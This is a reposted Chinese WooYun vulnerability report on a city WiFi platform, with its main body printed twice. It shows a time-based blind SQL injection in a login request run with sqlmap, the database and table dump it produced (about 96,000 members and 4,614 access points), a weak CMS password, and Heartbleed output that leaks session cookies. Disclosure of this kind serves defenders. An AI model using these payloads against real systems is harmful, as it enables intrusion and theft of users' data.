记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

wifi安全之无线城市漏洞打包(影响4600多台无线设备+9w用户信息)

2016-07-02 15:55

code 区域
看2位表哥都走大厂商了 我也试试呗

http://**.**.**.**/bugs/wooyun-2010-0206169

http://**.**.**.**/bugs/wooyun-2010-0204620

下载了app然后在登陆处用户名出错就试了下存在注入



1.jpg



code 区域
sqlmap语法:sqlmap.py -r 1.txt --dbs

-------------------------post数据包-----userName参数-----------

POST /JBaas/interfaceapp/checkLogin HTTP/1.1

Content-Length: 70

Content-Type: application/x-www-form-urlencoded

Host: **.**.**.**:8080

Connection: Keep-Alive

Accept-Encoding: gzip



passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27

-----------------------------payload----------

Payload: passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98' AND (SELECT * FROM (SELECT(SLEEP(5)))FhhX)-- NInl



code 区域
数据库信息

back-end DBMS: MySQL 5.0.12

available databases [5]:

[*] information_schema

[*] jbaas

[*] mysql

[*] performance_schema

[*] radiusdb



code 区域
当前库表信息 9w6会员信息 4614ap设备

Database: jbaas

+---------------------------------+---------+

| Table | Entries |

+---------------------------------+---------+

| t_bus_app_device | 96821 |

| t_bus_member | 96053 |

| t_bus_ap | 4614 |

| t_bus_app_log | 630 |

| t_portal_log | 114 |

| t_sys_acl | 105 |

| t_sys_dictionary | 77 |

| t_sys_role_resource | 49 |

| t_bus_market | 37 |

| t_portal_template | 31 |

| t_sys_resource | 25 |

| t_bus_shop | 24 |

| t_bus_app_feedback | 21 |

| t_bus_area | 20 |

| t_bus_vector | 19 |

| t_bus_ac | 16 |

| t_sys_unit | 15 |

| t_portal_template_content_tree | 14 |

| t_portal_address | 12 |

| t_portal_template_content | 12 |

| t_portal_messageset | 11 |

| t_portal_messagetemplate | 10 |

| t_portal_template_tree | 10 |

| t_bus_market_indoormap | 8 |

| t_portal_strategy | 8 |

| t_motor_config | 7 |

| t_bus_promotion | 6 |

| t_bus_goods | 5 |

| t_portal_advertisement | 4 |

| t_portal_advertisement_and_list | 4 |

| t_portal_advertisement_list | 4 |

| t_bus_app | 3 |

| t_portal_notice | 3 |

| t_sys_actor | 3 |

| t_bus_syn | 2 |

| t_portal_phone | 2 |

| t_sys_role | 2 |

| t_bus_app_config | 1 |

+---------------------------------+---------+



code 区域
这里包括wifi密码啥玩意的



2.png



code 区域
**.**.**.**/cms test 123456 进入



23.png



code 区域
一处openssl

python openssl.py **.**.**.** | more

---------------------------------------------------

Connecting...

Sending Client Hello...

Waiting for Server Hello...

... received message: type = 22, ver = 0302, length = 66

... received message: type = 22, ver = 0302, length = 16384

... received message: type = 22, ver = 0302, length = 14397

... received message: type = 22, ver = 0302, length = 331

... received message: type = 22, ver = 0302, length = 4

Sending heartbeat request...

... received message: type = 24, ver = 0302, length = 16384

Received heartbeat response:

0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...

0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......

0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".

0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.

0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................

0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.

0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...

0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............

0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................

0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.

00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............

00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................

00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................

00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML

00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch

00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1

0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36

0110: 20 53 45 20 32 2E 58 20 4D 65 74 61 53 72 20 31 SE 2.X MetaSr 1

0120: 2E 30 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 .0..Referer: htt

0130: 70 73 3A 2F 2F 34 32 2E 36 32 2E 31 31 2E 36 32 ps://**.**.**.**

0140: 2F 62 69 67 44 61 74 61 2F 6F 73 2F 6D 61 69 6E /bigData/os/main

0150: 2E 70 68 70 3F 63 3D 6C 6F 67 75 73 65 72 26 61 .php?c=loguser&a

0160: 3D 66 72 61 6D 65 26 73 69 74 65 69 64 3D 35 37 =frame&siteid=57

0170: 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E ..Accept-Encodin

0180: 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 0D g: gzip,deflate.

0190: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language

01a0: 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 : zh-CN,zh;q=0.8

01b0: 0D 0A 43 6F 6F 6B 69 65 3A 20 50 48 50 53 45 53 ..Cookie: PHPSES

01c0: 53 49 44 3D 61 66 62 37 38 62 61 33 33 37 39 37 SID=afb78ba33797

01d0: 36 63 61 34 34 64 39 31 36 30 32 62 35 31 37 66 6ca44d91602b517f

01e0: 33 35 35 30 0D 0A 0D 0A BA CF E8 6B 04 DC B3 2B 3550.......k...+

01f0: 9B F6 A2 F5 DE 3C 7E 41 32 F4 21 EC 03 03 03 03 .....<~A2.!.....

0200: 3D 6C 6F 67 3B 20 50 48 50 53 45 53 53 49 44 3D =log; PHPSESSID=

0210: 61 66 62 37 38 62 61 33 33 37 39 37 36 63 61 34 afb78ba337976ca4

0220: 34 64 39 31 36 30 32 62 35 31 37 66 33 35 35 30 4d91602b517f3550

0230: 0D 0A 0D 0A 72 73 9F 9D E6 64 96 EE 8F 35 75 6C ....rs...d...5ul

0240: A3 06 A9 80 3B 2F 1C AC 07 07 07 07 07 07 07 07 ....;/..........

0250: F0 C9 AA 0E 14 EC C0 42 F1 78 DF 98 36 98 51 AC .......B.x..6.Q.

0260: E4 17 58 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ..X.............

0270: 33 39 61 32 65 61 30 30 61 66 30 35 0D 0A 0D 0A 39a2ea00af05....

0280: 4E 3D 20 CF 76 95 0D 9D EB 6A C3 53 60 79 6F C8 N= .v....j.S`yo.

0290: 5E F1 CA BF 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ^...............

02a0: CB DA 28 9A F5 11 9E E1 3D 99 85 12 DD C4 97 47 ..(.....=......G

02b0: 37 63 64 62 30 66 65 66 61 65 31 37 66 62 34 66 7cdb0fefae17fb4f

02c0: 38 34 36 65 62 63 62 30 34 65 37 34 35 39 0D 0A 846ebcb04e7459..

02d0: 0D 0A FC 0F 13 20 24 95 5F 61 55 ED F1 80 DF 43 ..... $._aU....C

02e0: 1E 53 2B 62 07 E3 09 09 09 09 09 09 09 09 09 09 .S+b............

02f0: 5A 2E 42 F4 6E 98 81 E6 BF C5 5C 86 7E 24 01 86 Z.B.n.....\.~$..

0300: 44 13 AF D7 44 55 E8 AD 93 6D 34 9B 29 57 15 FB D...DU...m4.)W..

0310: C8 DC F4 AC C4 6B 4E 9C 0C 77 4B 06 06 06 06 06 .....kN..wK.....

0320: 37 BE 16 93 E0 32 3E 7A 51 CC 79 F3 2D 02 02 02 7....2>zQ.y.-...

0330: 07 E1 95 6F 3B 40 F2 94 07 07 07 07 07 07 07 07 ...o;@..........

0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................



34.png



漏洞证明:

code 区域
看2位表哥都走大厂商了 我也试试呗

http://**.**.**.**/bugs/wooyun-2010-0206169

http://**.**.**.**/bugs/wooyun-2010-0204620

下载了app然后在登陆处用户名出错就试了下存在注入



1.jpg



code 区域
sqlmap语法:sqlmap.py -r 1.txt --dbs

-------------------------post数据包-----userName参数-----------

POST /JBaas/interfaceapp/checkLogin HTTP/1.1

Content-Length: 70

Content-Type: application/x-www-form-urlencoded

Host: **.**.**.**:8080

Connection: Keep-Alive

Accept-Encoding: gzip



passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27

-----------------------------payload----------

Payload: passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98' AND (SELECT * FROM (SELECT(SLEEP(5)))FhhX)-- NInl



code 区域
数据库信息

back-end DBMS: MySQL 5.0.12

available databases [5]:

[*] information_schema

[*] jbaas

[*] mysql

[*] performance_schema

[*] radiusdb



code 区域
当前库表信息 9w6会员信息 4614ap设备

Database: jbaas

+---------------------------------+---------+

| Table | Entries |

+---------------------------------+---------+

| t_bus_app_device | 96821 |

| t_bus_member | 96053 |

| t_bus_ap | 4614 |

| t_bus_app_log | 630 |

| t_portal_log | 114 |

| t_sys_acl | 105 |

| t_sys_dictionary | 77 |

| t_sys_role_resource | 49 |

| t_bus_market | 37 |

| t_portal_template | 31 |

| t_sys_resource | 25 |

| t_bus_shop | 24 |

| t_bus_app_feedback | 21 |

| t_bus_area | 20 |

| t_bus_vector | 19 |

| t_bus_ac | 16 |

| t_sys_unit | 15 |

| t_portal_template_content_tree | 14 |

| t_portal_address | 12 |

| t_portal_template_content | 12 |

| t_portal_messageset | 11 |

| t_portal_messagetemplate | 10 |

| t_portal_template_tree | 10 |

| t_bus_market_indoormap | 8 |

| t_portal_strategy | 8 |

| t_motor_config | 7 |

| t_bus_promotion | 6 |

| t_bus_goods | 5 |

| t_portal_advertisement | 4 |

| t_portal_advertisement_and_list | 4 |

| t_portal_advertisement_list | 4 |

| t_bus_app | 3 |

| t_portal_notice | 3 |

| t_sys_actor | 3 |

| t_bus_syn | 2 |

| t_portal_phone | 2 |

| t_sys_role | 2 |

| t_bus_app_config | 1 |

+---------------------------------+---------+



code 区域
这里包括wifi密码啥玩意的



2.png



code 区域
**.**.**.**/cms test 123456 进入



23.png



code 区域
一处openssl

python openssl.py **.**.**.** | more

---------------------------------------------------

Connecting...

Sending Client Hello...

Waiting for Server Hello...

... received message: type = 22, ver = 0302, length = 66

... received message: type = 22, ver = 0302, length = 16384

... received message: type = 22, ver = 0302, length = 14397

... received message: type = 22, ver = 0302, length = 331

... received message: type = 22, ver = 0302, length = 4

Sending heartbeat request...

... received message: type = 24, ver = 0302, length = 16384

Received heartbeat response:

0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...

0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......

0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".

0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.

0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................

0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.

0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...

0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............

0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................

0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.

00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............

00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................

00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................

00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML

00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch

00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1

0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36

0110: 20 53 45 20 32 2E 58 20 4D 65 74 61 53 72 20 31 SE 2.X MetaSr 1

0120: 2E 30 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 .0..Referer: htt

0130: 70 73 3A 2F 2F 34 32 2E 36 32 2E 31 31 2E 36 32 ps://**.**.**.**

0140: 2F 62 69 67 44 61 74 61 2F 6F 73 2F 6D 61 69 6E /bigData/os/main

0150: 2E 70 68 70 3F 63 3D 6C 6F 67 75 73 65 72 26 61 .php?c=loguser&a

0160: 3D 66 72 61 6D 65 26 73 69 74 65 69 64 3D 35 37 =frame&siteid=57

0170: 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E ..Accept-Encodin

0180: 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 0D g: gzip,deflate.

0190: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language

01a0: 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 : zh-CN,zh;q=0.8

01b0: 0D 0A 43 6F 6F 6B 69 65 3A 20 50 48 50 53 45 53 ..Cookie: PHPSES

01c0: 53 49 44 3D 61 66 62 37 38 62 61 33 33 37 39 37 SID=afb78ba33797

01d0: 36 63 61 34 34 64 39 31 36 30 32 62 35 31 37 66 6ca44d91602b517f

01e0: 33 35 35 30 0D 0A 0D 0A BA CF E8 6B 04 DC B3 2B 3550.......k...+

01f0: 9B F6 A2 F5 DE 3C 7E 41 32 F4 21 EC 03 03 03 03 .....<~A2.!.....

0200: 3D 6C 6F 67 3B 20 50 48 50 53 45 53 53 49 44 3D =log; PHPSESSID=

0210: 61 66 62 37 38 62 61 33 33 37 39 37 36 63 61 34 afb78ba337976ca4

0220: 34 64 39 31 36 30 32 62 35 31 37 66 33 35 35 30 4d91602b517f3550

0230: 0D 0A 0D 0A 72 73 9F 9D E6 64 96 EE 8F 35 75 6C ....rs...d...5ul

0240: A3 06 A9 80 3B 2F 1C AC 07 07 07 07 07 07 07 07 ....;/..........

0250: F0 C9 AA 0E 14 EC C0 42 F1 78 DF 98 36 98 51 AC .......B.x..6.Q.

0260: E4 17 58 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ..X.............

0270: 33 39 61 32 65 61 30 30 61 66 30 35 0D 0A 0D 0A 39a2ea00af05....

0280: 4E 3D 20 CF 76 95 0D 9D EB 6A C3 53 60 79 6F C8 N= .v....j.S`yo.

0290: 5E F1 CA BF 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ^...............

02a0: CB DA 28 9A F5 11 9E E1 3D 99 85 12 DD C4 97 47 ..(.....=......G

02b0: 37 63 64 62 30 66 65 66 61 65 31 37 66 62 34 66 7cdb0fefae17fb4f

02c0: 38 34 36 65 62 63 62 30 34 65 37 34 35 39 0D 0A 846ebcb04e7459..

02d0: 0D 0A FC 0F 13 20 24 95 5F 61 55 ED F1 80 DF 43 ..... $._aU....C

02e0: 1E 53 2B 62 07 E3 09 09 09 09 09 09 09 09 09 09 .S+b............

02f0: 5A 2E 42 F4 6E 98 81 E6 BF C5 5C 86 7E 24 01 86 Z.B.n.....\.~$..

0300: 44 13 AF D7 44 55 E8 AD 93 6D 34 9B 29 57 15 FB D...DU...m4.)W..

0310: C8 DC F4 AC C4 6B 4E 9C 0C 77 4B 06 06 06 06 06 .....kN..wK.....

0320: 37 BE 16 93 E0 32 3E 7A 51 CC 79 F3 2D 02 02 02 7....2>zQ.y.-...

0330: 07 E1 95 6F 3B 40 F2 94 07 07 07 07 07 07 07 07 ...o;@..........

0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................



34.png



修复方案:

过滤 加强密码

知识来源: www.wooyun.org/bugs/wooyun-2016-0208629

阅读:126529 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“wifi安全之无线城市漏洞打包(影响4600多台无线设备+9w用户信息)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云